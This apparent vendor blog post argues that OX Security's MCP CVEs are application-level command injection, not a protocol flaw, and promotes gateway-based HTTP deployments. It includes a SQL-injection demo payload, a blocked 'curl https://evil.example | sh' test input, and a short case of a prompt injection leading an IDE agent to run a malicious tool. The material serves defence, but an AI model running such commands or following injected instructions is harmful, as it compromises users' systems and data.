
"The Mother of All AI Supply Chains" — Or Just the Same Old CLI Problem
OX Security recently published research they titled "The Mother of All AI Supply Chains," describing what they call a critical, systemic vulnerability at the core of Anthropic's Model Context Protocol. The report discloses 10 CVEs across popular AI frameworks, claims 150 million downloads and 200,000 servers are at risk, and argues that Anthropic's refusal to patch constitutes negligence.
The CVEs are real. The responsible disclosure work is valuable. But the framing is wrong in a way that matters for every organization evaluating MCP for production use.
The vulnerability is not in the MCP protocol. It is in how applications handle local process execution. Understanding this distinction is the difference between informed risk management and abandoning a sound protocol over a misattributed threat.
What OX Actually Found
Every CVE in the report follows the same pattern: an application accepts untrusted input and passes it to StdioServerParameters, the SDK construct that launches a local process and communicates with it over stdin/stdout.
The MCP specification defines multiple transports. Stdio is one. It exists for a specific use case: running a local server process on the same machine as the client. A Python script that reads your filesystem. A Node.js tool that queries a local database. The client spawns the process, sends JSON-RPC messages over stdin, and reads responses from stdout.
For stdio to work, it must execute a command. That is the entire purpose of the transport. The command starts the server process. If an application lets an untrusted user control which command gets executed, that is command injection in the application, not a flaw in the transport.
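The mechanic is easy to see with a minimal sketch. This uses only the standard library's subprocess module rather than the MCP SDK itself, and the child "server" is a stand-in one-liner, but the shape is the same: the command is the server, and JSON-RPC flows over its pipes.

```python
import json
import subprocess
import sys

# Stand-in "server": a child Python process that reads one JSON-RPC request
# from stdin and echoes a response on stdout. Illustrative only.
SERVER_CODE = (
    "import json,sys\n"
    "req = json.loads(sys.stdin.readline())\n"
    "print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'result': 'pong'}))\n"
)

# The command IS the server process. Whoever controls this list controls
# what gets executed on the local machine.
proc = subprocess.Popen(
    [sys.executable, "-c", SERVER_CODE],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    text=True,
)

request = {"jsonrpc": "2.0", "id": 1, "method": "ping"}
stdout, _ = proc.communicate(json.dumps(request) + "\n")
response = json.loads(stdout)
print(response["result"])  # -> pong
```

Everything hinges on that command list: the transport does exactly what it is told, which is why the question of who gets to populate it is an application decision, not a protocol one.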
Look at the CVEs individually:
- LiteLLM (CVE-2026-30623): An authenticated user can set arbitrary JSON configuration that flows into the stdio command. The application trusts user-supplied configuration to specify what process to run.
- Agent Zero (CVE-2026-30624): An unauthenticated web UI lets anyone configure MCP server commands. No input validation, no allowlist, no authentication.
- Fay Framework (CVE-2026-30618): An unauthenticated web GUI passes input directly to process execution.
- Windsurf (CVE-2026-30615): A prompt injection attack tricks the IDE's AI agent into calling a malicious local tool. The IDE's agent loop does not validate tool invocations against a policy.
- DocsGPT (CVE-2026-26015): A man-in-the-middle attack substitutes the transport type, forcing stdio where HTTP was configured. The application does not verify transport integrity.

Every one of these is an application-level input validation failure. The pattern is identical to SQL injection: a protocol (SQL) defines a query language; an application passes untrusted input into a query string; the resulting injection is not a vulnerability in SQL.
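The SQL parallel can be made concrete with a few lines of sqlite3. The injection lives entirely in the application's string concatenation; the parameterized version, using the same database and the same input, is immune:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

untrusted = "' OR '1'='1"  # attacker-supplied input

# Vulnerable: the application builds the query by concatenation.
# SQL itself is fine; the application created the injection.
unsafe_query = f"SELECT name FROM users WHERE name = '{untrusted}'"
leaked = conn.execute(unsafe_query).fetchall()
print(len(leaked))  # 1 -- the predicate was rewritten, so every row matches

# Fixed at the application layer: a parameterized query treats the
# input as data, never as syntax.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (untrusted,)
).fetchall()
print(len(safe))  # 0 -- no user is literally named "' OR '1'='1"
```

Nobody would file a CVE against SQL for the first query. The stdio CVEs have exactly this shape, with process arguments in place of query strings.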
The Conflation
OX's report conflates three distinct things:
The MCP specification is a JSON-RPC 2.0 protocol that defines how clients and servers exchange messages about tools, resources and prompts. It specifies message formats, capability negotiation and session management. It does not specify how servers are deployed or what trust boundaries exist between client and server.
The stdio transport is one of several transports defined in the specification. It exists for local development and desktop tooling. It spawns a process and communicates via pipes. By definition, it executes commands on the local machine.
Applications that misuse stdio accept untrusted input and pass it to process execution without validation. This is the vulnerability. It exists in the applications, not in the transport, and certainly not in the protocol.
Claiming this is "a critical systemic vulnerability at the core of MCP" is like claiming HTTP has a remote code execution vulnerability because a web application passes user input to os.system() in a CGI script. The protocol is not the problem. The application is.
Why Anthropic Declined to Patch
OX reports that Anthropic called the behavior "expected" and declined to modify the protocol's architecture. This framing implies negligence. In reality, it reflects a correct assessment of where the security boundary lies.
What would a "patch" to stdio look like? An allowlist of permitted commands? That would break every MCP server in existence, since each one has a different binary name. A sandbox around process execution? That is an operating system concern, not a protocol concern. A warning label in the SDK? The SDK documentation already states that stdio executes local processes. The entire API surface makes this explicit.
The fix belongs where the vulnerability exists: in applications that pass untrusted input to process execution. Each CVE in the report was fixable at the application layer. Several have already been patched there.
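What an application-layer fix looks like is straightforward. The sketch below is hypothetical (the server names, commands and rejection rules are illustrative, not from any real catalog): users select a server by name from an administrator-defined allowlist, and the application, never the user, supplies the command.

```python
# Hypothetical guard: user-influenced MCP server config is validated
# against an admin-defined allowlist before anything reaches process
# execution. Names and commands below are illustrative.
ALLOWED_SERVERS = {
    "filesystem": ["npx", "@modelcontextprotocol/server-filesystem"],
    "sqlite": ["uvx", "mcp-server-sqlite"],
}

def resolve_server_command(requested_name: str, extra_args: list) -> list:
    """Map a user-supplied server *name* to a pinned command; never let
    the user supply the command itself."""
    if requested_name not in ALLOWED_SERVERS:
        raise ValueError(f"server {requested_name!r} is not in the allowlist")
    for arg in extra_args:
        # Reject anything resembling an option flag or shell metacharacter.
        if arg.startswith("-") or any(c in arg for c in ";|&$`"):
            raise ValueError(f"rejected argument: {arg!r}")
    return ALLOWED_SERVERS[requested_name] + extra_args

print(resolve_server_command("filesystem", ["/srv/docs"]))

# A request for an arbitrary command fails closed:
try:
    resolve_server_command("curl https://evil.example | sh", [])
except ValueError as exc:
    print("blocked:", exc)
```

None of this required changing the protocol or the SDK, which is the point: the boundary belongs in the application that decides what to trust.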
The Real Problem: CLIs as a Trust Model
Where OX's research does point to something important is the broader pattern of treating CLIs and local tool execution as safe by default.
The stdio transport inherits the trust model of command-line tools: the user who invokes the command has already decided to trust it. This works for a developer running npx @modelcontextprotocol/server-filesystem /home/user/documents in their terminal. They chose the package. They chose the directory. They understand the blast radius.
It breaks when that same stdio invocation is:
- Triggered by an AI agent that was tricked by a prompt injection
- Configured through a web UI that accepts untrusted input
- Specified in a JSON config file downloaded from an unverified source
- Selected from a marketplace where package names can be typosquatted
This is the class of risk we identified early when designing Ferentin's architecture. Local tool execution is inherently high-trust. The process runs with the user's permissions. It can read files, make network requests, execute other processes. There is no isolation boundary between the MCP server and the rest of the system unless the operating system provides one.
For desktop AI assistants and developer tools, this trust model can be appropriate, provided the user gives informed consent. For production enterprise deployments, it is not.
Remote HTTP: A Different Trust Model
The MCP specification's Streamable HTTP transport operates under a fundamentally different trust model. The server is a remote HTTP endpoint. The client sends JSON-RPC messages over HTTPS. No local process is spawned. No command is executed on the client machine.
The security properties of this transport are the same as any authenticated API:
Network isolation. The server runs in its own environment, behind its own firewall, with its own credentials. Compromising the client does not compromise the server, and vice versa.
Authentication and authorization. HTTP transports support standard authentication: OAuth 2.0, bearer tokens, mTLS. Every request can be authenticated, authorized and attributed to an identity.
Policy enforcement. A gateway between client and server can evaluate policies on every tool invocation: which users can call which tools, with what parameters, under what conditions.
Audit logging. Every request and response is observable. Tool calls can be logged, monitored, alerted on and reviewed after the fact.
No process execution on the client. The client sends a JSON-RPC request. The server decides what to do with it. The client never executes arbitrary commands.
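The request shape under this model can be sketched with the standard library alone. The endpoint and token below are placeholders, and the request is constructed rather than sent; the point is what the client does and does not do:

```python
import json
import urllib.request

ENDPOINT = "https://mcp.example.com/mcp"   # hypothetical remote MCP server
TOKEN = "example-bearer-token"             # placeholder; issued by your IdP

# A JSON-RPC 2.0 tool-call payload. Tool name and arguments are illustrative.
payload = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {"name": "search", "arguments": {"query": "q3 revenue"}},
}

# The client's entire job: an authenticated HTTPS POST. No process is
# spawned; the attack surface is the endpoint, protected like any API.
req = urllib.request.Request(
    ENDPOINT,
    data=json.dumps(payload).encode(),
    headers={
        "Content-Type": "application/json",
        "Authorization": f"Bearer {TOKEN}",
    },
    method="POST",
)

print(req.get_method(), req.full_url)
print(req.get_header("Authorization"))
```

Every one of the properties listed above attaches naturally to this shape: the token carries identity, the gateway in front of the endpoint enforces policy, and the request and response are trivially loggable.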
None of the CVEs in OX's report apply to this architecture. There is no StdioServerParameters. There is no local process to inject into. The attack surface is the HTTP endpoint, which is protected by the same mechanisms that protect every other API in the enterprise.
The Marketplace Problem Is Real but Not MCP-Specific
OX reports that 9 of 11 MCP registries accepted a malicious proof-of-concept package. This is a genuine supply chain concern and it deserves attention.
But it is not an MCP-specific problem. The same attack works on npm, PyPI, Docker Hub, Homebrew taps, VS Code extensions and every other package ecosystem that accepts community contributions without rigorous verification. Typosquatting, namespace confusion and malicious packages are an industry-wide challenge.
The mitigation is also industry-standard: verified publishers, code signing, namespace governance and curated catalogs. For enterprise MCP deployments, this means administrators should control which MCP servers are available to their users, not leave it to individual developers to install arbitrary packages from unverified registries.
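One piece of that mitigation, integrity pinning, fits in a few lines. In this hypothetical sketch the administrator records the SHA-256 of each vetted server package, and installation refuses anything that does not match; the package names and bytes are illustrative:

```python
import hashlib

# Curated catalog: name -> pinned SHA-256 digest of the vetted artifact.
# Digests here are computed from placeholder bytes for illustration.
PINNED = {
    "filesystem-server-1.2.0": hashlib.sha256(b"vetted package bytes").hexdigest(),
}

def verify_artifact(name: str, data: bytes) -> bool:
    """Refuse any artifact whose digest does not match the pinned value."""
    expected = PINNED.get(name)
    if expected is None:
        return False  # not in the catalog at all: deny by default
    return hashlib.sha256(data).hexdigest() == expected

print(verify_artifact("filesystem-server-1.2.0", b"vetted package bytes"))  # True
print(verify_artifact("filesystem-server-1.2.0", b"tampered bytes"))        # False
# A typosquatted name ("l" for "1") simply is not in the catalog:
print(verify_artifact("filesystem-server-l.2.0", b"anything"))              # False
```

Pinning by digest defeats both tampering and typosquatting in one check, which is why it is standard practice across package ecosystems, not something unique to MCP.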
What This Means for Enterprise MCP Adoption
If you are evaluating MCP for production use, the OX report should not change your assessment of the protocol. It should sharpen your requirements for how MCP servers are deployed and managed.
Use remote HTTP transports for production workloads. Stdio is appropriate for local development. Production MCP servers should be remote HTTP endpoints with proper authentication, network isolation and monitoring.
Do not let end users configure MCP server connection parameters. Server configuration is an administrative function. If users can specify arbitrary server URLs or commands, you have an injection surface.
Deploy MCP servers behind a gateway with policy enforcement. Every tool invocation should be evaluated against a policy before execution. The policy should consider the user's identity, the tool being called, the parameters being passed and the context of the request.
Curate your MCP server catalog. Do not rely on public registries for production deployments. Vet servers, pin versions, verify integrity and control what is available to your users.
Monitor tool invocations. Log every tool call, every response and every error. Alert on anomalies. Review patterns. The telemetry from MCP tool calls is as important as the telemetry from any other API.
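The gateway policy check at the center of these recommendations can be sketched in a few lines. This is a hypothetical toy, not a real policy engine; the roles, tool names and rules are illustrative, but the deny-by-default shape is the part that matters:

```python
from dataclasses import dataclass, field

# Hypothetical gateway check: every tool invocation is evaluated against
# per-tool rules before being forwarded to the server.
@dataclass
class ToolCall:
    user: str
    role: str
    tool: str
    arguments: dict = field(default_factory=dict)

# tool name -> roles permitted to call it (illustrative rules)
POLICY = {
    "read_document": {"analyst", "admin"},
    "delete_record": {"admin"},
}

def authorize(call: ToolCall) -> bool:
    allowed_roles = POLICY.get(call.tool)
    if allowed_roles is None:
        return False          # unknown tools are denied by default
    return call.role in allowed_roles

print(authorize(ToolCall("alice", "analyst", "read_document")))   # True
print(authorize(ToolCall("bob", "analyst", "delete_record")))     # False
print(authorize(ToolCall("eve", "admin", "unregistered_tool")))   # False
```

A production policy would also inspect parameters and request context, as noted above, but even this minimal gate would have stopped the prompt-injection-to-tool-call path described in the Windsurf CVE.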
These are not novel requirements. They are the same requirements you apply to every other API, service and integration in your enterprise. MCP is a protocol. Protocols need infrastructure around them to be secure. That infrastructure is what separates a proof of concept from a production deployment.
Our Perspective
We built Ferentin as an MCP-native platform from day one. Every MCP interaction flows through Streamable HTTP, authenticated by OAuth 2.0 or bearer tokens, evaluated against tenant-scoped policies, logged for audit and compliance. No stdio. No local process execution. No implicit trust.
When we read OX's report, we recognized the pattern immediately. It is the same class of risk that led us to design the platform the way we did. Local tool execution without policy enforcement, identity attribution and isolation is not a foundation for enterprise AI.
The MCP protocol itself is sound. JSON-RPC 2.0 over HTTP with capability negotiation, session management and structured tool schemas is a solid foundation for AI agent communication. The question is not whether MCP is secure. It is whether your deployment of MCP is secure. And that depends entirely on the infrastructure you put around it.
If you are building production MCP infrastructure and want to discuss architecture, security models or deployment patterns, reach out. We have been thinking about this for a while and we are happy to share what we have learned.